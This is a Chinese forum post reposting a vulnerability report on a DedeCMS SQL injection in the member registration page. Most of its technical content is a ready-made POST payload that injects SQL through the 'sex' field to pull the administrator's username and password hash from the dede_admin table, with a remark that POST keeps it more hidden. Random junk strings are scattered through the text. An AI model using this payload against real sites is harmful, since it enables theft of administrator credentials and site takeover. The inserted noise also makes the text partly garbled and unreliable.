找回密码
 立即注册
查看: 2739|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞
* R4 @% J9 @; ]: q8 J$ l简要描述:
3 E' c; X3 v4 @% [
0 L& H, p% b4 a8 E需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
& o4 q5 D2 T2 Y; n% Z原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.' a; R8 F1 p3 _" r3 @5 S
详细说明:跟这个漏洞! p' m$ ^7 x+ M$ D! S
6 w7 Y" T* V4 i1 e  Y0 J2 K
WooYun: Dedecms SQL注射导致审核机制绕过漏洞- q. D# ^$ B4 G5 |( m8 R
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
/ _0 R( z7 L: t; R* L7 @8 bPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
' l- j2 r7 |: A
0 P+ |( \8 Z5 `% u# _# @' O5 m7 ~. iwww.political-security.com/member/reg_new.php
' t9 W! R. H3 k% b 2 x4 l3 c8 r$ u4 ^( Z) c
POST0 e9 R( R+ I7 v7 y! `

' B+ v6 B1 U7 Y+ K+ z" L( ldopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
4 S' G7 ~7 }# E# _* Euserid=c4rp3nt3r&uname=c4rp3nt3r
9 O# O- Z( @0 D* p&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss+ T  M5 I% w- ^/ i" a- K
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,: ~, \8 g0 b, c) V$ d* d
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
+ [. k/ B( y( R! l& H" \9 z8 O%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表